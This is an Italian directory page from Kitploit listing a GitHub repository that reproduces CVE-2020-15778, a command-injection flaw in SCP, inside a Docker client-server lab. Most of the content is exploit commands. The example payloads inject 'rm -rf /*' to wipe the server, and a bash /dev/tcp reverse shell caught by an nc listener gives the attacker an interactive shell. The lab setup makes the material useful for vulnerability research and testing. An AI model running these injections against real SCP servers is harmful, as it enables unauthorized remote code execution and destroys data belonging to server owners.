Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-15778 — Riproduce l'exploit di injection di comandi SCP CVE-2020-15778 con un setup client-server basato su Docker per testare l'esecuzione remota di codice e i payload di reverse shell. | Kitploit
Strumenti/GitHubGitHub/yifanzhg/cve-2020-15778
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubyifanzhg/cve-2020-15778

CVE-2020-15778

Riproduce l'exploit di injection di comandi SCP CVE-2020-15778 con un setup client-server basato su Docker per testare l'esecuzione remota di codice e i payload di reverse shell.

Vedi Repository
3113 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-15778

Introduzione

Questa repo riproduce CVE-2020-15778.

Passaggi

  1. Costruisci le immagini docker per il server e il client scp
cd client
docker build -t client-cve .
cd server
docker build -t server-cve .
  1. Avvia il server scp in un container.
docker run -d -P --name scp-server server-cve

Recupera l'indirizzo IP interno del server scp tramite

docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
  1. Esegui il client in un container.
docker run --name scp-client -i -t client-cve
  1. Inietta il tuo comando shell nel server scp chiamando il comando scp nel client.

Nel terminale del client, esegui

scp nil.txt root@<internal IP of scp server>:'`your command`/tmp'

La password è "PASSWORD".

Esempi

Ecco alcuni esempi per questo exploit.

  1. Elimina tutto nel server per mandarlo in crash.
scp nil.txt root@<internal IP of scp server>:'`rm -rf /*`/tmp'
  1. Rimanda la bash del server scp al client (simula ssh).

Mettiti in ascolto su una porta della macchina client.

nc -lvvp 8080

Usa scp per forzare il server a rimandare la bash interattiva nella macchina client.

scp nil.txt root@<internal IP of scp client>:'`bash -i >& /dev/tcp/<internal IP of scp client>/8080 0>& 1`/tmp'

L'indirizzo IP del client può essere recuperato tramite

docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
Scarica lo strumento